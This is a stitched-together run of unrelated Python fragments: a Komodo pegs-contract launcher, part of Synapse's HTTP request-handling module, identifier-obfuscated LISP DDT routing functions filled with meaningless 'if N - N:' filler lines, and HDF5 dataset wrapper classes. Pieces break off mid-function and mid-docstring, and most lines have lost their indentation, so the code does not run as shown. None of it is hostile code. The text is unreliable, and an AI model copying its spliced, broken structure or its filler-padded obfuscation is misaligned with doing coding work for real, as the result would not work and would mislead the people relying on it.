oraclefeed_launch_str = spawn_oraclefeed(coin, kmd_path, oracle_txid, primary_pubkey, bind_txid)
# Create the Peg
pegs_funding = input("Enter amount of Pegs funding (e.g. 100): ")
num_binds = 1
resp = primary_rpc.pegscreate(str(pegs_funding), str(num_binds), bind_txid)
print(resp)
if 'hex' in resp:
pegs_txid = primary_rpc.sendrawtransaction(resp['hex'])
check_if_tx_in_mempool(primary_rpc, pegs_txid)
print(colorize("Pegs TXID ["+str(pegs_txid)+"]", 'green'))
paramlist.append("-earlytxid="+pegs_txid)
print(colorize("The Pegs Contract has been created successfully!", 'green'))
info = primary_rpc.gatewaysinfo(bind_txid)
with open(cwd+"/"+coin+"_pegsinfo.json", "w+") as file:
file.write('{\n"Pegs_Launch_Parameters":"'+" ".join(paramlist)+'",\n')
file.write('"Oraclefeed_Launch_Parameters":"'+oraclefeed_launch_str+'",\n')
file.write('"Pegs_Creation_TXID":"'+str(pegs_txid)+'",\n')
file.write('"Gateways_Bind_TXID":"'+str(bind_txid)+'",\n')
file.write('"Oracle_TXID":"'+str(info['oracle_txid'])+'",\n')
file.write('"Token_TXID":"'+str(info['tokenid'])+'",\n')
file.write('"Coin":"'+str(info['coin'])+'",\n')
file.write('"Pubkeys":"'+str(info['pubkeys'])+'",\n')
file.write('"Gateways_Deposit_Address":"'+str(info['deposit'])+'"\n}')
print("Pegs Launch Parameters: "+' '.join(paramlist))
print("Pegs Creation TXID ["+str(bind_txid)+"]")
print("Gateways Bind TXID ["+str(bind_txid)+"]")
print("Oracle TXID ["+str(info['oracle_txid'])+"]")
print("Token TXID ["+str(info['tokenid'])+"]")
print("Coin ["+str(info['coin'])+"]")
print("Pubkeys ["+str(info['pubkeys'])+"]")
print("Gateways Deposit Address ["+str(info['deposit'])+"]")
print(colorize("Details have been written to "+coin+"_pegsinfo.json", 'blue'))
input("Press [Enter] to continue...")
return pegs_txid
else:
print(colorize("Pegs TXID failed! ["+str(result)+"]", 'red'))
input("Press [Enter] to continue...")
return 'back to menu'
def spawn_oraclefeed(dest_chain, kmd_path, oracle_txid, pubkey, bind_txid):
oraclefeed_build_log = str(dest_chain)+"_oraclefeed_build.log"
oraclefeed_build = open(oraclefeed_build_log,'w+')
print("Building oraclefeed ")
subprocess.Popen(["gcc", kmd_path+"/cc/dapps/oraclefeed.c", "-lm", "-o", kmd_path+"/oraclefeed"], stdout=oraclefeed_build, stderr=oraclefeed_build, universal_newlines=True)
oraclefeed_log = str(dest_chain)+"_oraclefeed.log"
oraclefeed_output = open(oraclefeed_log,'w+')
print("running oraclefeed ")
subprocess.Popen([kmd_path+"/oraclefeed", dest_chain, oracle_txid, pubkey, "IhhL", bind_txid, kmd_path+"/komodo-cli"], stdout=oraclefeed_output, stderr=oraclefeed_output, universal_newlines=True)
print(" Use tail -f "+kmd_path+"/"+oraclefeed_log+" for oraclefeed log console messages")
print(colorize("IMPORTANT: The oraclefeed must be running at all times for the Pegs contract to work!", "red"))
oraclefeed_launch_str = str(kmd_path+"/oraclefeed "+dest_chain+" "+oracle_txid+" "+pubkey+" IhhL "+bind_txid+" "+kmd_path+"/komodo-cli")
print(colorize("Launch it with "+oraclefeed_launch_str, "blue"))
input("Press [Enter] to continue...")
return oraclefeed_launch_str
def oraclefeed_tui(jsonfile=''):
if jsonfile == '':
choice = input("select json file from list? (y/n)")
if choice == 'y' or choice == 'Y':
jsonfile = select_file(cwd, 'json')
if jsonfile == '':
while True:
try:
                    dest_chain = input('Enter name of Pegs chain: ')
                    rpc = rpclib.def_credentials(dest_chain)
                    break
                except:
                    print(colorize(dest_chain+" conf file does not exist! Try again.", "red"))
while True:
kmd_path = input("Input komodod path (e.g. /home/user/komodo/src): ")
if not os.path.isfile(kmd_path+'/komodod'):
print("komodod not found in "+kmd_path+"! Try again.")
else:
break
oracle_txid = select_oracle_txid(rpc)
pubkey = rpc.getinfo()['pubkey']
bind_txid = select_gateway(rpc)
else:
try:
with open(jsonfile, 'r') as f:
oraclefeed_json = json.loads(f.read())
oraclefeed_params = oraclefeed_json['Oraclefeed_Launch_Parameters'].split(" ")
kmd_path = oraclefeed_params[0].replace("oraclefeed","")
dest_chain = oraclefeed_params[1]
oracle_txid = oraclefeed_params[2]
pubkey = oraclefeed_params[3]
bind_txid = oraclefeed_params[5]
except Exception as e:
print("Something wrong with json file.")
print(e)
spawn_oraclefeed(dest_chain, kmd_path, oracle_txid, pubkey, bind_txid)
def get_commit_hash(repo_path):
os.chdir(repo_path)
proc = subprocess.run(['git', 'log', '-n', '1'], check=True, stdout=subprocess.PIPE, universal_newlines=True)
output = proc.stdout
return output.split()[1]
def launch_chain(coin, kmd_path, params, pubkey=''):
if pubkey != '':
params.append("-pubkey="+pubkey)
print(params)
commit = get_commit_hash(kmd_path)
test_log = coin+"_"+commit+".log"
test_output = open(test_log,'w+')
print("Launching "+coin+" daemon")
print(colorize("Launch Params: ["+str(' '.join([kmd_path+"/komodod"]+params))+"]", "green"))
subprocess.Popen([kmd_path+"/komodod"]+params, stdout=test_output, stderr=test_output, universal_newlines=True)
print(" Use `tail -f "+kmd_path+"/"+test_log+"` for "+coin+" console messages")
loop = 0
started = 0
print("Waiting for "+coin+" to start...")
while started == 0:
time.sleep(30)
print("Waiting for "+coin+" to start...")
loop += 1
try:
pegs_rpc = rpclib.def_credentials(coin)
coin_info = pegs_rpc.getinfo()
print(coin_info)
started = 1
break
except:
print("Waiting for "+coin+" to start...")
pass
if started == 1:
break
if loop > 10:
print("Something went wrong. Check "+test_log)
break
def spawn_chain_pair(coin, kmd_path, paramlist):
secondary_params = paramlist[:]
    launch_chain(coin, kmd_path, paramlist)
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import html
import logging
import types
import urllib
from http import HTTPStatus
from io import BytesIO
from typing import Awaitable, Callable, TypeVar, Union
import jinja2
from canonicaljson import encode_canonical_json, encode_pretty_printed_json, json
from twisted.internet import defer
from twisted.python import failure
from twisted.web import resource
from twisted.web.server import NOT_DONE_YET, Request
from twisted.web.static import NoRangeStaticProducer
from twisted.web.util import redirectTo
import synapse.events
import synapse.metrics
from synapse.api.errors import (
CodeMessageException,
Codes,
RedirectException,
SynapseError,
UnrecognizedRequestError,
)
from synapse.http.site import SynapseRequest
from synapse.logging.context import preserve_fn
from synapse.logging.opentracing import trace_servlet
from synapse.util.caches import intern_dict
logger = logging.getLogger(__name__)
HTML_ERROR_TEMPLATE = """<!DOCTYPE html>
<html lang=en>
<head>
<meta charset="utf-8">
<title>Error {code}</title>
</head>
<body>
<p>{msg}</p>
</body>
</html>
"""
def wrap_json_request_handler(h):
"""Wraps a request handler method with exception handling.
Also does the wrapping with request.processing as per wrap_async_request_handler.
The handler method must have a signature of "handle_foo(self, request)",
where "request" must be a SynapseRequest.
The handler must return a deferred or a coroutine. If the deferred succeeds
we assume that a response has been sent. If the deferred fails with a SynapseError we use
    it to send a JSON response with the appropriate HTTP response code. If the
    deferred fails with any other type of error we send a 500 response.
"""
async def wrapped_request_handler(self, request):
try:
await h(self, request)
except SynapseError as e:
code = e.code
logger.info("%s SynapseError: %s - %s", request, code, e.msg)
# Only respond with an error response if we haven't already started
# writing, otherwise lets just kill the connection
if request.startedWriting:
if request.transport:
try:
request.transport.abortConnection()
except Exception:
# abortConnection throws if the connection is already closed
pass
else:
respond_with_json(
request,
code,
e.error_dict(),
send_cors=True,
pretty_print=_request_user_agent_is_curl(request),
)
except Exception:
# failure.Failure() fishes the original Failure out
# of our stack, and thus gives us a sensible stack
# trace.
f = failure.Failure()
logger.error(
"Failed handle request via %r: %r",
request.request_metrics.name,
request,
exc_info=(f.type, f.value, f.getTracebackObject()),
)
# Only respond with an error response if we haven't already started
# writing, otherwise lets just kill the connection
if request.startedWriting:
if request.transport:
try:
request.transport.abortConnection()
except Exception:
# abortConnection throws if the connection is already closed
pass
else:
respond_with_json(
request,
500,
{"error": "Internal server error", "errcode": Codes.UNKNOWN},
send_cors=True,
pretty_print=_request_user_agent_is_curl(request),
)
return wrap_async_request_handler(wrapped_request_handler)
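# Illustrative sketch only (this servlet and its method are hypothetical, not part
# of this module): a handler with the "handle_foo(self, request)" signature wrapped
# by wrap_json_request_handler.
#
#     class PingServlet(object):
#         @wrap_json_request_handler
#         async def handle_ping(self, request):
#             respond_with_json(request, 200, {"pong": True}, send_cors=True)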
TV = TypeVar("TV")
def wrap_html_request_handler(
h: Callable[[TV, SynapseRequest], Awaitable]
) -> Callable[[TV, SynapseRequest], Awaitable[None]]:
"""Wraps a request handler method with exception handling.
Also does the wrapping with request.processing as per wrap_async_request_handler.
The handler method must have a signature of "handle_foo(self, request)",
where "request" must be a SynapseRequest.
"""
async def wrapped_request_handler(self, request):
try:
await h(self, request)
except Exception:
f = failure.Failure()
return_html_error(f, request, HTML_ERROR_TEMPLATE)
return wrap_async_request_handler(wrapped_request_handler)
def return_html_error(
f: failure.Failure, request: Request, error_template: Union[str, jinja2.Template],
) -> None:
"""Sends an HTML error page corresponding to the given failure.
Handles RedirectException and other CodeMessageExceptions (such as SynapseError)
Args:
f: the error to report
request: the failing request
error_template: the HTML template. Can be either a string (with `{code}`,
`{msg}` placeholders), or a jinja2 template
"""
if f.check(CodeMessageException):
cme = f.value
code = cme.code
msg = cme.msg
if isinstance(cme, RedirectException):
logger.info("%s redirect to %s", request, cme.location)
request.setHeader(b"location", cme.location)
request.cookies.extend(cme.cookies)
elif isinstance(cme, SynapseError):
logger.info("%s SynapseError: %s - %s", request, code, msg)
else:
logger.error(
"Failed handle request %r",
request,
exc_info=(f.type, f.value, f.getTracebackObject()),
)
else:
code = HTTPStatus.INTERNAL_SERVER_ERROR
msg = "Internal server error"
logger.error(
"Failed handle request %r",
request,
exc_info=(f.type, f.value, f.getTracebackObject()),
)
if isinstance(error_template, str):
body = error_template.format(code=code, msg=html.escape(msg))
else:
body = error_template.render(code=code, msg=msg)
body_bytes = body.encode("utf-8")
request.setResponseCode(code)
request.setHeader(b"Content-Type", b"text/html; charset=utf-8")
request.setHeader(b"Content-Length", b"%i" % (len(body_bytes),))
request.write(body_bytes)
finish_request(request)
def wrap_async_request_handler(h):
"""Wraps an async request handler so that it calls request.processing.
This helps ensure that work done by the request handler after the request is completed
is correctly recorded against the request metrics/logs.
The handler method must have a signature of "handle_foo(self, request)",
where "request" must be a SynapseRequest.
The handler may return a deferred, in which case the completion of the request isn't
logged until the deferred completes.
"""
async def wrapped_async_request_handler(self, request):
with request.processing():
await h(self, request)
# we need to preserve_fn here, because the synchronous render method won't yield for
# us (obviously)
return preserve_fn(wrapped_async_request_handler)
class HttpServer(object):
""" Interface for registering callbacks on a HTTP server
"""
def register_paths(self, method, path_patterns, callback):
""" Register a callback that gets fired if we receive a http request
with the given method for a path that matches the given regex.
        If the regex contains groups, these get passed to the callback via
        an unpacked tuple.
Args:
method (str): The method to listen to.
path_patterns (list<SRE_Pattern>): The regex used to match requests.
callback (function): The function to fire if we receive a matched
request. The first argument will be the request object and
subsequent arguments will be any matched groups from the regex.
This should return a tuple of (code, response).
"""
pass
class JsonResource(HttpServer, resource.Resource):
""" This implements the HttpServer interface and provides JSON support for
Resources.
Register callbacks via register_paths()
    Callbacks can return a tuple of status code and a dict, in which case
    the dict will automatically be sent to the client as a JSON object.
    The JsonResource is primarily intended for returning JSON, but callbacks
    may send something other than JSON by using the methods on the request
    object directly and returning None.
"""
isLeaf = True
_PathEntry = collections.namedtuple(
"_PathEntry", ["pattern", "callback", "servlet_classname"]
)
def __init__(self, hs, canonical_json=True):
resource.Resource.__init__(self)
self.canonical_json = canonical_json
self.clock = hs.get_clock()
self.path_regexs = {}
self.hs = hs
def register_paths(
self, method, path_patterns, callback, servlet_classname, trace=True
):
"""
Registers a request handler against a regular expression. Later request URLs are
checked against these regular expressions in order to identify an appropriate
handler for that request.
Args:
method (str): GET, POST etc
path_patterns (Iterable[str]): A list of regular expressions to which
the request URLs are compared.
callback (function): The handler for the request. Usually a Servlet
servlet_classname (str): The name of the handler to be used in prometheus
and opentracing logs.
trace (bool): Whether we should start a span to trace the servlet.
"""
method = method.encode("utf-8") # method is bytes on py3
if trace:
# We don't extract the context from the servlet because we can't
# trust the sender
callback = trace_servlet(servlet_classname)(callback)
for path_pattern in path_patterns:
logger.debug("Registering for %s %s", method, path_pattern.pattern)
self.path_regexs.setdefault(method, []).append(
self._PathEntry(path_pattern, callback, servlet_classname)
)
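    # Illustrative sketch only (the pattern, callback and servlet names here are
    # hypothetical): groups in the compiled regex are passed to the callback as
    # keyword arguments.
    #
    #     import re
    #     pattern = re.compile("^/_matrix/client/r0/rooms/(?P<room_id>[^/]*)$")
    #     json_resource.register_paths(
    #         "GET", [pattern], on_room_request, "RoomServlet"
    #     )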
def render(self, request):
""" This gets called by twisted every time someone sends us a request.
"""
defer.ensureDeferred(self._async_render(request))
return NOT_DONE_YET
@wrap_json_request_handler
async def _async_render(self, request):
""" This gets called from render() every time someone sends us a request.
This checks if anyone has registered a callback for that method and
path.
"""
callback, servlet_classname, group_dict = self._get_handler_for_request(request)
# Make sure we have a name for this handler in prometheus.
request.request_metrics.name = servlet_classname
# Now trigger the callback. If it returns a response, we send it
# here. If it throws an exception, that is handled by the wrapper
# installed by @request_handler.
kwargs = intern_dict(
{
name: urllib.parse.unquote(value) if value else value
for name, value in group_dict.items()
}
)
callback_return = callback(request, **kwargs)
# Is it synchronous? We'll allow this for now.
if isinstance(callback_return, (defer.Deferred, types.CoroutineType)):
callback_return = await callback_return
if callback_return is not None:
code, response = callback_return
self._send_response(request, code, response)
def _get_handler_for_request(self, request):
"""Finds a callback method to handle the given request
Args:
request (twisted.web.http.Request):
Returns:
Tuple[Callable, str, dict[unicode, unicode]]: callback method, the
label to use for that method in prometheus metrics, and the
                dict mapping keys to path components extracted from the matched request URL.
)
if 11 - 11: OoOoOO00 % OOooOOo . i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
if 28 - 28: OOooOOo . OoO0O00 / o0oOOo0O0Ooo + II111iiii / iIii1I11I1II1 * II111iiii
if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
if 47 - 47: II111iiii
if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 60 - 60: I1ii11iIi11i * iII111i / OoOoOO00 . o0oOOo0O0Ooo / iIii1I11I1II1
if 94 - 94: OoO0O00 . ooOoO0o
if 25 - 25: I1Ii111 % OOooOOo
if 82 - 82: Ii1I
i1OO0o = map_request . target_eid
Oo000o0o0 = map_request . target_group
oo0ooooO = lisp_print_eid_tuple ( i1OO0o , Oo000o0o0 )
iIiIi1i1Iiii = map_request . nonce
I11IiIi1I = LISP_DDT_ACTION_NULL
if 17 - 17: iII111i . i1IIi . i1IIi
if 76 - 76: OoooooooOO % IiII
if 81 - 81: iII111i . OOooOOo * i1IIi
if 14 - 14: oO0o
if 16 - 16: iII111i
I11 = None
if ( lisp_i_am_ms ) :
IIII = lisp_site_eid_lookup ( i1OO0o , Oo000o0o0 , False )
if ( IIII == None ) : return
if 65 - 65: i11iIiiIii
if ( IIII . registered ) :
I11IiIi1I = LISP_DDT_ACTION_MS_ACK
iiI = 1440
else :
i1OO0o , Oo000o0o0 , I11IiIi1I = lisp_ms_compute_neg_prefix ( i1OO0o , Oo000o0o0 )
I11IiIi1I = LISP_DDT_ACTION_MS_NOT_REG
iiI = 1
if 11 - 11: i1IIi - Oo0Ooo % O0 . II111iiii % oO0o
else :
I11 = lisp_ddt_cache_lookup ( i1OO0o , Oo000o0o0 , False )
if ( I11 == None ) :
I11IiIi1I = LISP_DDT_ACTION_NOT_AUTH
iiI = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( oo0ooooO , False ) ) )
if 43 - 43: I1Ii111 - Oo0Ooo % II111iiii / Ii1I . iII111i . iIii1I11I1II1
elif ( I11 . is_auth_prefix ( ) ) :
if 69 - 69: I11i - I11i / I11i + IiII - I1IiiI
if 21 - 21: I1IiiI * OoO0O00 * oO0o . o0oOOo0O0Ooo + II111iiii
if 62 - 62: ooOoO0o - OoooooooOO / I1ii11iIi11i / iII111i - o0oOOo0O0Ooo
if 70 - 70: oO0o % OoooooooOO * I1IiiI - OoOoOO00 * OoOoOO00 . OOooOOo
I11IiIi1I = LISP_DDT_ACTION_DELEGATION_HOLE
iiI = 15
I11I111Ii1II = I11 . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( I11I111Ii1II ,
# I1ii11iIi11i * II111iiii
green ( oo0ooooO , False ) ) )
if 59 - 59: OoO0O00
if ( Oo000o0o0 . is_null ( ) ) :
i1OO0o = lisp_ddt_compute_neg_prefix ( i1OO0o , I11 ,
lisp_ddt_cache )
else :
Oo000o0o0 = lisp_ddt_compute_neg_prefix ( Oo000o0o0 , I11 ,
lisp_ddt_cache )
i1OO0o = lisp_ddt_compute_neg_prefix ( i1OO0o , I11 ,
I11 . source_cache )
if 81 - 81: i11iIiiIii
I11 = None
else :
I11I111Ii1II = I11 . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( I11I111Ii1II , green ( oo0ooooO , False ) ) )
if 57 - 57: Oo0Ooo * iIii1I11I1II1 - OoOoOO00 % iII111i % I1ii11iIi11i + Ii1I
iiI = 1440
if 82 - 82: IiII * Oo0Ooo - iIii1I11I1II1 - i11iIiiIii
if 85 - 85: OoooooooOO
if 37 - 37: OoooooooOO + O0 + I1ii11iIi11i + IiII * iII111i
if 15 - 15: i11iIiiIii / Oo0Ooo - OOooOOo . IiII
if 11 - 11: OOooOOo / i1IIi % Oo0Ooo
if 65 - 65: OOooOOo % I1ii11iIi11i
iI1IIII1ii1 = lisp_build_map_referral ( i1OO0o , Oo000o0o0 , I11 , I11IiIi1I , iiI , iIiIi1i1Iiii )
iIiIi1i1Iiii = map_request . nonce >> 32
if ( map_request . nonce != 0 and iIiIi1i1Iiii != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , iI1IIII1ii1 , ecm_source , port )
return
if 25 - 25: o0oOOo0O0Ooo - I1Ii111 * I1ii11iIi11i + OoooooooOO
if 93 - 93: OoOoOO00 % I1ii11iIi11i * I11i
if 34 - 34: I11i - oO0o + I11i * OoooooooOO * I11i
if 73 - 73: OOooOOo * iII111i * OoO0O00
if 11 - 11: I1Ii111 * II111iiii
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if 98 - 98: I1IiiI * Oo0Ooo
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
I1I1I = eid . hash_address ( entry_prefix )
OO0o0OoooOOoO = eid . addr_length ( ) * 8
ooooOo00OO0o = 0
if 4 - 4: O0 * iII111i - iII111i + iIii1I11I1II1 * iIii1I11I1II1
if 48 - 48: I1Ii111 * I11i
if 52 - 52: ooOoO0o
if 16 - 16: ooOoO0o % iII111i - o0oOOo0O0Ooo % I11i + i11iIiiIii
for ooooOo00OO0o in range ( OO0o0OoooOOoO ) :
iIIiI1iiIIiIiii = 1 << ( OO0o0OoooOOoO - ooooOo00OO0o - 1 )
if ( I1I1I & iIIiI1iiIIiIiii ) : break
if 33 - 33: oO0o % I1Ii111 % Oo0Ooo . Ii1I
if 3 - 3: I1Ii111 . o0oOOo0O0Ooo
if ( ooooOo00OO0o > neg_prefix . mask_len ) : neg_prefix . mask_len = ooooOo00OO0o
return
if 6 - 6: oO0o . OoOoOO00 * i11iIiiIii
if 96 - 96: i1IIi . OoO0O00 . OoO0O00 - o0oOOo0O0Ooo - Ii1I
if 33 - 33: ooOoO0o + I1ii11iIi11i - I1IiiI . iII111i / OoO0O00
if 91 - 91: OOooOOo - OoooooooOO . OoO0O00
if 34 - 34: Ii1I . I1IiiI . i1IIi * I1ii11iIi11i
if 77 - 77: ooOoO0o . II111iiii
if 41 - 41: IiII
if 27 - 27: IiII / IiII
if 91 - 91: Ii1I
if 93 - 93: OoO0O00 * OoO0O00 * I1ii11iIi11i * OoO0O00 * o0oOOo0O0Ooo
def lisp_neg_prefix_walk ( entry , parms ) :
i1OO0o , O0OOO0oO0OO0 , iiII1iI = parms
if 8 - 8: I1ii11iIi11i
if ( O0OOO0oO0OO0 == None ) :
if ( entry . eid . instance_id != i1OO0o . instance_id ) :
return ( [ True , parms ] )
if 88 - 88: I11i
if ( entry . eid . afi != i1OO0o . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( O0OOO0oO0OO0 ) == False ) :
return ( [ True , parms ] )
if 36 - 36: iIii1I11I1II1 - ooOoO0o * OoO0O00 * OoO0O00 . II111iiii
if 49 - 49: O0 + OoO0O00 - I1ii11iIi11i + ooOoO0o
if 90 - 90: O0 . Ii1I * OOooOOo * OoooooooOO * ooOoO0o * Ii1I
if 12 - 12: ooOoO0o * OoooooooOO * i1IIi
if 3 - 3: o0oOOo0O0Ooo + Ii1I - i1IIi . OoooooooOO % Ii1I
if 39 - 39: o0oOOo0O0Ooo
lisp_find_negative_mask_len ( i1OO0o , entry . eid , iiII1iI )
return ( [ True , parms ] )
if 73 - 73: IiII
if 92 - 92: OOooOOo / ooOoO0o . I1Ii111 . iII111i / ooOoO0o
if 83 - 83: iIii1I11I1II1 - OoO0O00 - I1Ii111
if 27 - 27: IiII - iII111i * i11iIiiIii % i11iIiiIii + OoOoOO00 . I1Ii111
if 10 - 10: IiII / i11iIiiIii
if 6 - 6: I11i - OOooOOo
if 100 - 100: Oo0Ooo / OOooOOo + iII111i - o0oOOo0O0Ooo + OoO0O00 % IiII
if 91 - 91: Ii1I % I11i % Oo0Ooo / OoO0O00 - II111iiii - o0oOOo0O0Ooo
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
Images can be stored as list of file directories when using tif file,
or as a dynamic hdf link to a hdf file.
:param hdf_group: hdf5 File or Group object
:param address_list: list of str: list of str to search in
:param multiple: if True, return list of all addresses matching criteria
:return: str or list of str
"""
if address_list is None:
address_list = dataset_addresses(hdf_group)
all_addresses = []
# First look for 2D image data
for address in address_list:
data = hdf_group.get(address)
if not data or data.size == 1: continue
if len(data.shape) > 1 and 'signal' in data.attrs:
if multiple:
all_addresses += [address]
else:
return address
# Second look for image files
for address in address_list:
        data = hdf_group.get(address)
        if data is None: continue
        if 'signal' in data.attrs:  # not sure if this is generally true, but seems to work for pilatus and bpm images
if multiple:
all_addresses += [address]
else:
return address
"""
file = str(data[0])
file = os.path.join(filepath, file)
if os.path.isfile(file):
if multiple:
all_addresses += [address]
else:
return address
"""
if multiple:
return all_addresses
else:
return None
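# Minimal usage sketch (the file name is illustrative; assumes image datasets carry
# a 'signal' attribute, as checked above):
#
#     with load('scan.nxs') as hdf:
#         image_address = find_image(hdf)                   # first match or None
#         all_image_addresses = find_image(hdf, multiple=True)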
"----------------------------------------------------------------------------------------------------------------------"
"-------------------------------------------- DatasetWrapper ----------------------------------------------------------"
"----------------------------------------------------------------------------------------------------------------------"
class HdfDataset:
"""
HDF Dataset reloader
Self contained holder for a HDF5 dataset, will load the data when called
    dataset = HdfDataset('hdf/file/path.hdf', '/dataset/address')
data = dataset()
HdfDataset has attributes:
dataset.filename
dataset.address
dataset.name
dataset.group
dataset.size
dataset.shape
dataset.ndim
dataset.len
If the hdf address doesn't associate with a dataset in the hdf file, a KeyError is raised
"""
size = 0
shape = 0
ndim = 0
len = 0
def __init__(self, filename, address):
self.filename = filename
self.address = address
self.name = address_name(address)
self.group = address_group(address)
# Check address
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
if dataset is None:
raise KeyError('"%s" is not availble in %s' % (self.address, self.filename))
self._update(dataset)
def __repr__(self):
return "HdfDataset(\"%s\", \"%s\", shape: %s)" % (self.filename, self.address, self.shape)
def __len__(self):
return self.len
def __call__(self):
return self._load_data()
def _update(self, dataset):
self.size = dataset.size
self.shape = dataset.shape
self.ndim = dataset.ndim
self.len = dataset.len()
def _load_data(self):
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = dataset_data(dataset)
return data
def files(self, filenames, default=None):
"""Generate another address object pointing at a different file"""
filenames = fn.liststr(filenames)
if len(filenames) == 1:
try:
                return HdfDataset(filenames[0], self.address)
except KeyError:
return default
out = []
for filename in filenames:
out += [self.files(filename, default)]
return out
def data(self):
"""Return data directly from dataset"""
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = dataset_data(dataset)
return data
def string(self):
"""Return string from dataset"""
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = dataset_string(dataset)
return data
def value(self):
"""Return float value or mean of array"""
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = np.mean(dataset)
return data
def array(self, array_len=1):
"""Return array, single values are copied"""
data = self.data()
if self.ndim == 1:
return data
if self.ndim == 0:
return np.repeat(data, array_len)
return np.reshape(data, -1)
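# Minimal usage sketch for HdfDataset (file name and address are illustrative):
#
#     dataset = HdfDataset('scan.nxs', '/entry1/measurement/eta')
#     values = dataset()            # re-reads the data from file on each call
#     mean_value = dataset.value()  # float value, or mean of an array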
"----------------------------------------------------------------------------------------------------------------------"
"---------------------------------------------- HdfWrapper ------------------------------------------------------------"
"----------------------------------------------------------------------------------------------------------------------"
class HdfWrapper(h5py.File):
"""
Implementation of h5py.File, with additional functions
nx = Hdf5Nexus('/data/12345.nxs')
Additional functions:
nx.nx_dataset_addresses() - list of all hdf addresses for datasets
nx.nx_tree_str() - string of internal data structure
nx.nx_find_name('eta') - returns hdf address
nx.nx_find_addresses( addresses=['/']) - returns list of addresses
nx.nx_find_attr(attr='signal') - returns address with attribute
nx.nx_find_image() - returns address of image data
nx.nx_getdata(address) - returns numpy array of data at address
nx.nx_array_data(n_points, addresses) - returns dict of n length arrays and dict of addresses
nx.nx_value_data(addresses) - returns dict of values and dict of addresses
nx.nx_str_data(addresses, format) - returns dict of string output and dict of addresses
nx.nx_image_data(index, all) - returns 2/3D array of image data
"""
def __init__(self, filename, mode='r', *args, **kwargs):
super(HdfWrapper, self).__init__(filename, mode, *args, **kwargs)
def nx_reload(self):
"""Closes the hdf file and re-opens"""
filename = self.filename
self.close()
self.__init__(filename)
def tree(self, address='/', detail=False):
return tree(self.get(address), detail=detail)
def dataset_addresses(self, addresses='/', recursion_limit=100, get_size=None, get_ndim=None):
"""
Return list of addresses of datasets, starting at each address
:param hdf_group: hdf5 File or Group object
        :param addresses: list of str or str : start in this / these addresses
:param recursion_limit: Limit on recursivley checking lower groups
:param get_size: None or int, if int, return only datasets with matching size
:param get_ndim: None or int, if int, return only datasets with matching ndim
:return: list of str
"""
return dataset_addresses(self.get('/'), addresses, recursion_limit, get_size, get_ndim)
def find(self, name, match_case=True, whole_word=True):
address_list = self.dataset_addresses()
return find_name(name, address_list, match_case, whole_word)
def find_image(self):
return find_image(self.get('/'), multiple=True)
def find_attr(self, attr):
return find_attr(self.get('/'), attr)
def find_nxclass(self, nx_class):
return find_nxclass(self.get('/'), nx_class)
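# Minimal usage sketch for HdfWrapper (file name is illustrative); as a subclass of
# h5py.File it can be used as a context manager:
#
#     with HdfWrapper('scan.nxs') as nx:
#         print(nx.tree())
#         eta_addresses = nx.find('eta')
#         image_addresses = nx.find_image()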
"----------------------------------------------------------------------------------------------------------------------"
"---------------------------------------------- HdfScan -------------------------------------------------------------"
"----------------------------------------------------------------------------------------------------------------------"
class HdfScan(Scan):
"""
Scan for HDF files
Only reads data when requested, and stores data in the internal namespace
Data can be requested using the hdf address or the name of the dataset (e.g. /entry1/data/name)
Usage:
d = HdfScan('hdf_file.nxs')
d('entry1/data/sum') >> finds dataset at this location, returns the array
d('eta') >> finds dataset called 'eta' in hdf file, returns the array
d.tree() >> returns str of hdf structure
d.address('name') >> returns hdf address of 'name'
d.find_name('name') >> returns list of hdf addresses matching 'name'
d.find_image() >> returns location of image data, either tiff link or 3d volume
d.axes() >> automatically finds the default xaxis, returns the array
d.signal() >> automatically finds the default yaxis, returns the array
d.image(idx) >> finds the image location if available and returns a detector image
"""
def __init__(self, filename, **kwargs):
self.filename = filename
self.file = fn.file2name(filename)
self.scan_number = fn.scanfile2number(filename)
namespace = {
'filename': filename,
'filetitle': self.file,
'scan_number': self.scan_number
}
alt_names = {
# shortcut: name in namespace
'scanno': ['scan_number'],
'cmd': ['scan_command'],
'energy': ['en'],
}
super(HdfScan, self).__init__(namespace, alt_names, **kwargs)
#self._label_str.extend(['scan_number', 'filetitle'])
self._hdf_address_list = []
self._hdf_name2address = {}
def reset(self):
"""Reset the namespace"""
self._namespace = {
'filename': self.filename,
'filetitle': self.file,
            'scan_number': self.scan_number
}
